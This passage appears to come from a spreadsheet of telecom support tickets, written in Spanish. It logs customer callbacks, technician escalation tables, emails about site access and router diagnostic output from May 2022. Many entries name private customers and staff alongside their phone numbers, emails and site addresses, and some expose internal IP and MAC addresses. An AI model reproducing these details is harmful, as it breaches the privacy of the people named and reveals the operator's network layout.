CC_GMG_GT_INTERNET_TIENDA_090#SH INT DESC
INTERFACE                      STATUS         PROTOCOL DESCRIPTION
EM0/0                          ADMIN DOWN     DOWN
GI0/0                          UP             UP       WAN PRINCIPAL/_/313900308T/_/
GI0/1                          UP             UP       LAN DEL CLIENTE
GI0/0/0                        ADMIN DOWN     DOWN     INTERFACE ACTUALMENTE NO ESTA EN USO
GI0/0/1                        ADMIN DOWN     DOWN     INTERFACE ACTUALMENTE NO ESTA EN USO
GI0/0/2                        ADMIN DOWN     DOWN     INTERFACE ACTUALMENTE NO ESTA EN USO
GI0/0/3                        ADMIN DOWN     DOWN     INTERFACE ACTUALMENTE NO ESTA EN USO
CE0/1/0                        DOWN           DOWN
CE0/1/1                        DOWN           DOWN
LO5                            UP             UP       MONITOREO DEL CNOC
VL1                            UP             UP       LAN DEL CLIENTE</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SR. SELVIN DIAZ 50032831 PROCEDE A UNICA EQUIPOS, SE LE SOLICITA REINICIAR EL EQUIPO MERAKI MX.</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE SR. SELVIN DIAZ 50032831 SE BRINDA RETROALIMENTACION A CLIENTE **
ID 1001791508
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE CLIENTE SR. SELVIN DIAZ 50032831 NO RESPONDE, ENVIA A BUZON SE INTENTARA LUEGO **
ID 1001858747
**</t>
  </si>
  <si>
    <t>F4559853</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ENIO MARROQUIN 52451734 MENCIONA QUE YA TODO ESTAFUNCIONANDO CORRECTAMENTE
-ID 1001728195</t>
  </si>
  <si>
    <t>F4559866</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE REIVI CASTRO AL 9825-4074 INDICA QUE ESTARA MONITOREANDO EL SERVICIO HASTA MAÑANA Y SOLICITA QUE SE LE LLAME DE 9:30 A 10:00 AM PARA CONFIRMAR || SE NOTIFICA A GESTOR **
ID 1001874028
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  REIVI CASTRO 98254074 NO RESPONDE, SE INTENTARA LUEGO
-ID 1001825289</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  REIVI CASTRO 98254074 NO RESPONDE, ENVIA A BUZON || SE INTENTARA LUEGO**
-ID 1001845758
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE REIVI CASTRO 98254074 PERO NO RESPONDE, SE INTENARA LUEGO
-ID 1001729623</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE REIVI CASTRO  9825-4074 NO RESPONDE, SE INTENTARA LUEGO
-ID 1001864299</t>
  </si>
  <si>
    <t>F4559872</t>
  </si>
  <si>
    <t>SE SOLICITA APOYO NUEVAMENTE A CLIENTE POR CORREO
KENNY ROBERT RIVERA JUAREZ
MIÉ 11/05/2022 21:05
ESTIMADO CLIENTE,
EN SEGUIMIENTO AL ENLACE PARA LA AGENCIA CC_FUNDGENESIS_GT_CAMOJA_055, SOLICITAMOS SU APOYO CON LO REQUERIDO EN CORREO ANTERIOR.
SALUDOS CORDIALES.</t>
  </si>
  <si>
    <t>F4559882</t>
  </si>
  <si>
    <t>DESPACHO SV				
	WO OPEN                                			9:29:00 A. M.
1/5	RICARDO DE PAZ	78432633	2 HORAS	11:29:00
2/5	HUMBERTO CHIQUILLO	78523419	3 HORAS	12:29:00
3/5	HUMBERTO CHIQUILLO	78523419	4 HORAS	13:29:00
4/5	OSCAR HERNANDEZ	7855-0164	5 HORAS	14:29:00
5/5	JUAN RIVAS 	7606-7202	7 HORAS	16:29:00</t>
  </si>
  <si>
    <t>F4559887</t>
  </si>
  <si>
    <t>SE VALIDA QUE NO HAY SEGUIMIENTO DESDE LA RESPUESTA DEL CORREO.
11/05/2022 10:25:55 GUATEMALA/CENTRO AMERICA (FRANCISCO EDUARDO QUEZADA GARCIA):
SE PROCEDE A RESPONDER CORREO DE CLIENTE, SE QUEDA  A LA ESPERA DE RESPUESTA.
POR LO QUE SE CONTACTA CON EL PR HEYDA DIANETH CASTILLO RECINOS AL 59811335 ID 1001850756 PERO NO INGRESA LA LLAMADA INDICA QUE PRESENTA DAÑOS EN LA LÍNEA. POR LO QUE SE CONTACTA AL 77410482 Y ATIENDE ESTIVEN JOSE SALGUERO AL ID 1001850915 DONDE CONFIRMA QUE EL SERVICIO SI PRESENTA AFECTACIÓN PERO POR TEMA DE CLIMA (CUANDO LLUEVE) HOY A ESTADO SOLEADO Y ESTA ESTABLE POR LO QUE CONFIRMA EL CIERRE DE LA FALLA VALIDAR EL CIERRE CON LA SD SE NOTIFICA AL GESTOR FRANCISCO.QUEZADA VÍA SKYPE EL CAMBIO DE ESTADO.</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE HEYDA DIANETH CASTILLO 59811335 - 77410482 AMBOS NUMEROS ENVIAN A BUZON
-ID  1001722112 - 1001722196</t>
  </si>
  <si>
    <t>F4559890</t>
  </si>
  <si>
    <t>SE LLAMA A JOHANA CALLEJAS 25063838 ACTUALMENTE EN LLAMADA ...</t>
  </si>
  <si>
    <t>JOHANA CALLEJAS 25063838 SE REALIZARON PRUEBAS SE CONFIRMQUE A A NIVEL DE CLARO EL ENLACE CONTINUA OPERATIVO Y ESTABLE, SE LE INFORMA DE LA SATURACION ENCONTRADA, INFORMA QUE REVISARA SU LAN Y EVALUARA SI NECESITAN CONTRATAR UN MAYOR ANCHO DE BANDA, SE PROCEDE AL CIERRE DEL INCIDENTE:
&lt;ID1041076&gt;DISP INT GI0/0/4
GIGABITETHERNET0/0/4 CURRENT STATE : UP
LINE PROTOCOL CURRENT STATE : UP
LAST LINE PROTOCOL UP TIME : 2017-09-03 00:43:04
DESCRIPTION:WAN PRINCIPAL/_/ID1041076/_/
ROUTE PORT,THE MAXIMUM TRANSMIT UNIT IS 1500
INTERNET ADDRESS IS 10.131.196.217/30
IP SENDING FRAMES' FORMAT IS PKTFMT_ETHNT_2, HARDWARE ADDRESS IS 5CE8-83E4-65B7
LAST PHYSICAL UP TIME   : 2017-09-03 00:43:04
LAST PHYSICAL DOWN TIME : 2017-09-03 00:42:06
CURRENT SYSTEM TIME: 2017-09-28 20:08:43
PORT MODE: COMMON COPPER
SPEED :  100,  LOOPBACK: NONE
DUPLEX: FULL,  NEGOTIATION: ENABLE
MDI   : AUTO,  CLOCK   : -
LAST 300 SECONDS INPUT RATE 11290208 BITS/SEC, 1253 PACKETS/SEC
LAST 300 SECONDS OUTPUT RATE 6009144 BITS/SEC, 943 PACKETS/SEC
INPUT PEAK RATE 47631384 BITS/SEC,RECORD TIME: 2017-09-22 16:32:46
OUTPUT PEAK RATE 31119728 BITS/SEC,RECORD TIME: 2017-09-05 13:56:24
INPUT:  579179390 PACKETS, 695714997503 BYTES
  UNICAST:          577990184,  MULTICAST:             1189206
  BROADCAST:                0,  JUMBO:                       0
  DISCARD:                  0,  TOTAL ERROR:                 0
  CRC:                      0,  GIANTS:                      0
  JABBERS:                  0,  THROTTLES:                   0
  RUNTS:                    0,  SYMBOLS:                     0
  IGNOREDS:                 0,  FRAMES:                      0
OUTPUT:  338025282 PACKETS, 140587616717 BYTES
  UNICAST:          338025280,  MULTICAST:                   0
  BROADCAST:                2,  JUMBO:                       0
  DISCARD:                  0,  TOTAL ERROR:                 0
  COLLISIONS:               0,  EXCESSIVECOLLISIONS:         0
  LATE COLLISIONS:          0,  DEFERREDS:                   0
    INPUT BANDWIDTH UTILIZATION THRESHOLD : 100.00%
    OUTPUT BANDWIDTH UTILIZATION THRESHOLD: 100.00%
    INPUT BANDWIDTH UTILIZATION  : 2.87%
    OUTPUT BANDWIDTH UTILIZATION : 5.02%</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SR. JOHANA CALLEJAS 2106380 NO CONTESTO ID: 1001816116.</t>
  </si>
  <si>
    <t>F4559894</t>
  </si>
  <si>
    <t>SE LLAMO AL NUMERO DEL GDN Y LA LLAMADA COMPLETA.
CONTESTA EL OPERADOR.
LLAMADA DESDE APLICACION VIVO.</t>
  </si>
  <si>
    <t>SE LLAMA AL CLIENTE RUBY REYES 41517131, CLIENTE COMENTA QUE EL E1 SE ENCUENTRA ACTIVO PERO YA QUE HA CAIDO VARIAS VECES SOLICITA QUE SE QUEDE EN OBSERVACIÓN Y VALIDAR A LAS 16 HORAS. INDICA QUE HA RESTABLECIDO CON REINICIAR EL EQUIPO AETHRA.
RESULTADO: LLAMADA HECHA
NOMBRE: 41517131
NÚMERO: 41517131
INICIO: HOY, 11:03 A. M.
FIN: HOY, 11:07 A. M.
DURACIÓN: 4:07
ID DE LLAMADA: 1001754334</t>
  </si>
  <si>
    <t>**SE LLAMA  A CLIENTE RUBI REYES  AL 41517131 INDICA QUE SIGUE TENIENDO PROBLEMAS CON LA PLANTA **
ID 1001872708
**</t>
  </si>
  <si>
    <t>SE LLAMO AL NUMERO DEL GDN LA LLAMADA COMPLETA. PERO NO CONTESTAN.
POSIBLEMENTE EL CLIENTE YA SE RETIRO.
SE CONTINUA CON EL SEGUIMIENTO EL DIA DE MAÑANA.
1001891870
COLA:
NOMBRE: A: 22183333
NÚMERO: 22183333
DURACIÓN: 0:00:09
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 22183333
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 11/05/2022 18:21:44</t>
  </si>
  <si>
    <t>F4559895</t>
  </si>
  <si>
    <t>SE LLAMA A CINDY QUIEN INDICA QUE NO SE ENCUENTRA EN SITIO POR DESCANSO COMENTA QUE EL DIA DE HOY LA SUCURSAL ESTA CERRADA Y PARA REALIZAR PRUEBAS SERIA EL DIA DE MAÑANA.-</t>
  </si>
  <si>
    <t>F4559903</t>
  </si>
  <si>
    <t>SE ENVIO CORREO A CLIENTE
JURGEN RENE BOCH CAAL
MIÉ 11/05/2022 10:22
BUEN DÍA
ESTIMADO CLIENTE, ACTUALMENTE ESTAMOS VERIFICANDO SU ENLACE Y OBSERVAMOS QUE HAY PÉRDIDA DE PAQUETES HACIA EL EQUIPO DE RADIO DE ULTIMA MILLA, SE CONTINÚA REALIZANDO PRUEBAS, LE ESTAREMOS INFORMANDO POR ESTE MEDIO.
SALUDOS.
.</t>
  </si>
  <si>
    <t>F4559905</t>
  </si>
  <si>
    <t>**SE LLAMA  A CLIENTE OTTO PUAC AL 30896590 CLIENTE CONFIRMA SERVICIO ESTABLE Y OPERATIVO .
ID 1001872013
**</t>
  </si>
  <si>
    <t>**SE LLAMA  A CLIENTE OTTO PUAC AL 30896590 INIDCA QUE ESTARAN REALIZANDO PRUEBAS Y SOLICITA QUE SE LE LLAME POR LA TARDE NO BRINDA HORA **
ID 1001752865
**</t>
  </si>
  <si>
    <t>F4559923</t>
  </si>
  <si>
    <t>SE CONTACTA CON CLIENTE JOSUE CANIZ 41673388 /  2378 3900 EXT. 12344 PARA CONSULTAR EL INCONVENIENTE CLIENTE SE ENCUENTRA EN UNA REUNION INDICA QUE SE LE ESCRIBA VIA WHATSAPP, SE PROCEDE
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>SE ENVIAN PRUEBAS AL CLIENTE VIA CORREO Y VIA WHATSAPP A LA ESPERA DE LA RESPUESTA
NLACE TELEFONÍA - JURÍDICO
MONICA YIREH CASTILLO POON
ENVIANDO...
BUENOS DÍAS ESTIMADO,
MUCHA GRACIAS POR LA INFORMACIÓN VÍA CORREO.
LE COMENTO QUE SE REVISARON LAS PRUEBAS ENVIADAS, SIN EMBARGO, EL ENLACE QUE REPORTA SE ENCUENTRA SEGÚN CORREO ES EN LA DIRECCIÓN 7MA AVENIDA 1-13 ZONA 2 PERO SEGÚN ID CON LA QUE SE APERTURA FALLA ESTÁ EN 6 AVE 2-71 ZONA 2.
ADICIONAL LE COMENTAMOS QUE LA SERIAL DEL EQUIPO CISCO ENVIADO NO COINCIDE CON EL DEL ENLACE REPORTADO, YA QUE TAMBIÉN SE REVISÓ LO LOG'S DE ACTIVIDAD Y EL EQUIPO LLEVA MÁS DE 2 SEMANAS DE ESTAR ACTIVO Y NO SE OBSERVA LOG'S DE CAIDAS DE LA LAN.
FAVOR CONFIRMAR EL ID DEL ENLACE CORRECTO Y ADICIONAL SI LA EXTENSIÓN CON LA QUE REALIZARON PRUEBAS ES 19570.
SE ADJUNTA PRUEBAS
&lt;GNCYGTAJN2D1B04B03EIM12&gt;PING -VPN  HOSTED_PBX_CLARO -C 1500 -S 1500 -M 20 -B 10.105.10.115
  PING 10.105.10.115: 1500  DATA BYTES, PRESS CTRL_C TO BREAK
    !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
  --- 10.105.10.115 PING STATISTICS ---
    1500 PACKET(S) TRANSMITTED
    1500 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 1/2/31 MS
&lt;GNCYGTAJN2D1B04B03EIM12&gt;
SALUDOS,</t>
  </si>
  <si>
    <t>F4559924</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE  MARVIN AGUILAR AL 70070421 CLIENTE CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
ID 1001744761
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ABIGAIL QUEZADA AL 74378321 ENIVA A BUZON , SE INTENTARA LUEGO **
ID 1001744381
**</t>
  </si>
  <si>
    <t>F4559928</t>
  </si>
  <si>
    <t>SE LLAMAA CLIENTE CLAUDIA RAMIREZ-78877974  ---COMENTA QUE YA APLICO REINICIO, ADEMAS EN LAS PRUEBAS YA TODO OK- SOLICITA QUE SE VALIDE E 30 MINUTOS ##
1001738174
COLA:
NOMBRE: A: 0050378877974
NÚMERO: 0050378877974
DURACIÓN: 0:00:16
ESTADO: CONECTADA
DETALLES: 0050378877974
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 11/05/2022 10:22:45</t>
  </si>
  <si>
    <t>SE LLAMO AL E1- Y CONTESTO SEÑORITA CLAUDIA, NOS COMETA QUE NO TIENE LLAMADAS SALIENTES. REALIZA PRUEBAS Y EN EFECTO NO POSEE LLAMADAS SALIENTES- POR LO QUE APLICARA RESET A SU PBX Y AL E1- ##PIDE SE LE MARQUE EN 15 MINUTOS ##
RESULTADO: LLAMADA HECHA
NOMBRE: 0050322044100
NÚMERO: 0050322044100
INICIO: HOY, 09:50
FIN: HOY, 09:54
DURACIÓN: 4:36
ID DE LLAMADA: 1001725308</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  CLAUDIA RAMIREZ-78877974 QUIEN CONFIRMA EL FUNCIONAMIENTO DEL SERVICIO
-ID 1001753260 - 1001753993</t>
  </si>
  <si>
    <t>F4559929</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE YOLANDA CALGUA AL 40835174 INDICA QUE AUN CUENTA CON INCONVENIENTE INDICA QUE REINICIARON EL EQUIPO PERO ENCIENDEN LAS LUCES EN COLOR AMARILLO LA LUZ LAN INDICA QUE ESTA INTERMITENTE Y LAS OTRAS 2 ESTAN EN AMARRILLO LA DE PODER Y LA PON || SE LE NOTIFICA A GESTOR **
ID 1001746660
**</t>
  </si>
  <si>
    <t>F4559932</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ADOLFO ORTIZ AL 42208462 SE CONTACTA A CL Y SE DEJA EN LINEA CON GESTOR **
ID 1001756693
**</t>
  </si>
  <si>
    <t>EN LLAMADA CON CLIENTE ALEGANDRO SE COORDINARÁ VISITA PARA VERIFICAR EQUIPOS, LIENTE INDICA QUE NO ES NECESARIO TRAMITAR PERMISOS</t>
  </si>
  <si>
    <t>SE LE SOLICITA AL CLIENTE UBICAR EQUIPO RAD OPTIMUX 4E1</t>
  </si>
  <si>
    <t>F4559933</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ENCARGADO AGENCIA 33729697 CONTESTA LA SEÑORITA ADELINA MORALES QUIEN INDICA QUE AUN NO CUENTA CON SERVICIO NO TIENE ACCESO AUN || SE NOTIFICA A GESTOR **
ID 1001750784
**</t>
  </si>
  <si>
    <t>F4559936</t>
  </si>
  <si>
    <t>SE CONTACTA CON CLIENTE ESVIN PEREZ 40326786 PARA REALIZAR PRUEBAS
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ESVIN PEREZ 40326786 QUIEN CONFIRMA EL FUNCIONAMIENTO DEL SERVICIO
-ID 1001846743</t>
  </si>
  <si>
    <t>CLIENTE NECESITA UN TECNICO DE MANERA URGENTE YA  QUE INDICA QUE EL COBRE NO ESTA  CONECTADO, EL DIA DE HOY HUBO ACCIDENTE CAUSADO POR UN CAMION, INDICA QUE LLEGO EL PERSONAL DE CLARO Y QUE MOVIERON LA CT A OTRO POSTE PERO NO LA CONECTARON HACIA EL SERVICIO, CLIENTE INDICA QUE EL PUEDE APOYAR CON LA REPARACION SIN EMBARGO INDICA QUE ESTA HACIENDO UNOS CAMBIOS DENTRO DE LA EMPRESA POR LO MISMO DEL ACCIDENTE. SOLICITA QUE LLEGUEN LO MAS PRONTO POSIBLE, INDICA QUE LOS TECNICOS LLEGUEN PREPARADOS YA QUE SON 150 MTS LO QUE TIENEN QUE CABLEARON APROX.
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>F4559939</t>
  </si>
  <si>
    <t>-* JOSELIN HERRERA 79319595 (CLIENTE) INFORMA QUE LUEGO DEL REINICIO EL SERVICIO SE HA MANTENIDO UP, CONFIRMA DE MOMENTO TODO OK Y AUTORIZA CIERRE DE TICKET -*
-*</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JOSELIN HERRERA 57248224 NO RESPONDE, ENVIA A BUZON SE INTENTARA LUEGO **
ID 1001790376
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JOSELIN HERRERA  AL 57248224 NO RESPONDE, ENVIA A BUZON || SE INTENTARA LUEGO**
ID 1001759621
**</t>
  </si>
  <si>
    <t>F4559940</t>
  </si>
  <si>
    <t>SE LLAMA A SR. ISAAC LOPEZ 78555287 ACTUALMENTE REALIZANDO PRUEBAS....</t>
  </si>
  <si>
    <t>SR. ISAAC LOPEZ 78555287 CON FIRMA Y VALIDA ENLACE, SE PROCEDE AL CIERRE DEL INCIDENTE, ID: 1001784860. CLIENTE ESCALARA CON SU PROVEEDOR DE FIREWAL
PC DE CLIENTE:
ID1036059#SH ARP
PROTOCOL  ADDRESS          AGE (MIN)  HARDWARE ADDR   TYPE   INTERFACE
INTERNET  10.149.48.1             -   6CB2.AE62.9C50  ARPA   FASTETHERNET4
INTERNET  10.149.48.2             5   18DE.D7EB.F79D  ARPA   FASTETHERNET4
INTERNET  190.86.173.241          4   3024.A946.3BD1  ARPA   VLAN1
INTERNET  190.86.173.242          4   3024.A946.3BD1  ARPA   VLAN1
INTERNET  190.86.173.243          0   INCOMPLETE      ARPA
INTERNET  190.86.173.244          0   INCOMPLETE      ARPA
INTERNET  190.86.173.245          0   INCOMPLETE      ARPA
INTERNET  190.86.173.246          -   6CB2.AE62.9C4C  ARPA   VLAN1
3024.A946.3BD1
HP INC.
ID1036059#PING 190.86.173.241
TYPE ESCAPE SEQUENCE TO ABORT.
SENDING 5, 100-BYTE ICMP ECHOS TO 190.86.173.241, TIMEOUT IS 2 SECONDS:
!!!!!
SUCCESS RATE IS 100 PERCENT (5/5), ROUND-TRIP MIN/AVG/MAX = 1/2/4 MS</t>
  </si>
  <si>
    <t>CLIENTE SR. ISAAC LOPEZ 78555287 INFORMA QUE PUEDE REALIZAR LAS PRUEBAS DESDE LAS 12 PM.</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SR. ISAAC LOPEZ 78555287 ...</t>
  </si>
  <si>
    <t>F4559943</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE MIGUEL MEDINA/ 89888581 MENCIONA QUE PERSISTE EL INCONVENIENTE, SE DEJA EN CONFERENCIA CON GESTOR
-ID 1001745990</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE MIGUEL MEDINA AL  89888581 SE CONTACTA A CL Y SE DEJA EN LINEA CON GESTOR **
ID 1001808616
**</t>
  </si>
  <si>
    <t>F4559954</t>
  </si>
  <si>
    <t>**SE LLAMA JAIME  A CLIENTE AL 70110223 INDICA QUE YA NO SE ENCUENTRA EN SITIO PERO QUE SE LE LLAME A LA SEÑORITA NOHEMI 71682866
ID 1001795251
**</t>
  </si>
  <si>
    <t>**SE LLAMA A  CLIENTE JAIME AL 70110223 INDICA QUE NO SE ENCUENTRA EN SITIO PERO QUE SE LE LLAME A LAS SEÑORITA NOHEMI,  AUNQUE INDICA QUE EL YA REALIZO PRUEBAS DE PRIMER NIVEL REINICIO EQUIPOS VERIFICO CONEXIONES Y NO LEVANTA SOLICITA VISITA TECNICA YA QUE SI SE LE LLAMA A LA SEÑORITA NOHEMI ELLA NO PODRA REALIZAR MAS PRUEBAS, BRINDA LOS SIGUIENTES DATOS PARA VISITA || SE NOTIFICA A
 GESTOR **
HORARIO DE ATENCION: 7:30 AM A 19:30:00 HRS
GESTION DE PERMISOS: SOLO IDENTIFICADOS
DIRECCION: CASERIO EL CANELO CALLE PRINCIPAL FINCA LARACHE CARRETERA A LOS NARANJOS
ATENDERA EN SITIO: NOHEMI
ID 1001795251
**</t>
  </si>
  <si>
    <t>F4559955</t>
  </si>
  <si>
    <t>SE GENERÓ LA FALLA MASIVA: F4560262 || CAÍDA TOTAL || RADIO SLS_01_SAN_LUIS || MASIVO_HN ||</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A ING
ACTUALIZACION DE DISEÑO 1587969OH</t>
  </si>
  <si>
    <t>F4559963</t>
  </si>
  <si>
    <t>SE TIENE EN LINEA A CLIENTE MONICA ESTRADA AL 25057000 EXT 0, QUIEN SOLICITA SE LE ESPERE EN LINEA.
1001866476
COLA:
NOMBRE: A: 25057000
NÚMERO: 25057000
DURACIÓN: 0:01:59
ESTADO: CONECTADA
DETALLES: 25057000
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: LUVY.SANDOVAL
FECHA Y HORA LOCALES: 11/05/2022 16:33:40</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE MONICA ESTRADA AL 25057000 INFORMA QUE AUN NO PUEDE NAVEGAR QUE SE QUEDA CARGANDO LA PAGINA || SE NOTIFICA A GESTOR **
ID 1001799916
**</t>
  </si>
  <si>
    <t>SE VALIDA QUE EN CRONOLOGÍA DE FALLA, PERO NO HAY AVANCES DESDE EL HORARIO  13:08:58   POR LO QUE SE CONTACTA CON MONICA ESTRADA AL 25057000 ID 1001857312  PARA EL SEGUIMIENTO DEL TICKET Y COMENTA QUE AUN ESTA SIN SERVICIO POR LO QUE SE CONTACTA AL GESTOR  LUVY.SANDOVAL AL 8126 ID 1001858381 Y COMENTA LUVY QUE ESTA GENERANDO UNA WO POR LO QUE FINALIZARA SU PROCESO Y LUEGO SE CONTACTARA CON EL CL  LLAMA AL 25057000  EXT 0 HASTA LAS 17:30   A LA ESPERA DE LOS AVANCES.  SE MUEVE DE ESTADO YA QUE NO HAY NADA PENDIENTE POR EL CLIENTE.</t>
  </si>
  <si>
    <t>F4559976</t>
  </si>
  <si>
    <t>SE HABLA CON CLIENTE 23049696  SOLICITA SE PUEDA VALIDAR SI NO ES PROBLEMA DE VLAN, SE NOTIFICARA A GESTOR PARA EL SEGUIMIENTO
-ID 1001774704</t>
  </si>
  <si>
    <t>SE LLAMA A TECNICO PIDE QUE SE LE MARQUE NUEVAMENTE EN 30 MINUTOS</t>
  </si>
  <si>
    <t>TABLA DE ESCALAMIENTO METRO PLANTA EXTERNA OCCIDENTE				
	WO OPEN                        		SD	11:15
1/4	JORGE FINGADO	58261199	2 HORAS	13:15:00
2/4	JORGE FINGADO	58261199	3 HORAS	14:15:00
3/4	RENE AGUSTIN	58261183	5 HORAS	16:15:00
4/4	RODOLFO MORALES	58261609	6 HORAS	17:15:00</t>
  </si>
  <si>
    <t>F4559985</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL 52  55 51 74 52 99  CONTESTA UNA SEÑORITA QUIEN INDICA QUE VE FUERA EL SERVICIO AUN QUE VA A TRANSFERIR LLAMADA CON SERGIO GARCIA CONTESTA PERO DEJA EN ESPERA Y NO RETOMA LLAMADA || SE INTENTARA LUEGO **
ID 1001809915
**</t>
  </si>
  <si>
    <t>F4559986</t>
  </si>
  <si>
    <t>*SE LLAMA A CLIENTE MARCO ALEJANDRO ILLESCAS AL 22912000  EXT. 9000 INDICA QUE CONSULTARA CON LOS ASESORES Y QUE SE LE LLAME EN 20 MIN NUEVAMENTE **
ID 1001807419
**</t>
  </si>
  <si>
    <t>F4559991</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE PARA GESTIONAR LOS PERMISOS DE PERSONAL TECNICO
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: MIÉRCOLES, 11 DE MAYO DE 2022 13:19
PARA: CARLOS SOSA &lt;CSOSA@5B.COM.GT&gt;; MONITOREO FALLAS ATM &lt;MONITOREOFALLASATM@5B.COM.GT&gt;
CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; AXEL SAMUEL LOPEZ ORTIZ &lt;AXELS.LOPEZ@CLARO.COM.GT&gt;
ASUNTO: ESTION DE PERMISOS || ATM 285 || SD1124710 || F4559991
BUENA TARDE
SOLICITAMOS PUEDA GESTIONARSE EL ACCESO A PERSONAL TÉCNICO DE CLARO PARA EL INGRESO
A SUS INSTALACIONES PARA REALIZAR LAS REPARACIONES NECESARIAS.
DIRECCIÓN: BANRURAL PLAZA FLORIDA, CALZADA SAN JUAN 1-83 ZONA 7 LOCAL 415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559997</t>
  </si>
  <si>
    <t>SE LLAMO AL NUMERO DEL GDN Y LA LLAMADA COMPLETA.
SE SOLICITA HABLAR CON EL CLIENTE DARWIN AVILA, QUIEN SOLICITA OBSERVACION PARA EL DIA DE MAÑANA A LAS 10:00AM
LLAMADA DESDE VIVO.</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE DARWIN AVILA AL 32905014 CONFIRMA SERVICIO ESTABLE PERO SOLICITA QUE SE DEJE EN OBSERVACION Y QUE SE LE LLAME A LAS 16:30 PM NUEVAMENTE PARA CONFIRMAR **
ID 1001806265
**</t>
  </si>
  <si>
    <t>F4559998</t>
  </si>
  <si>
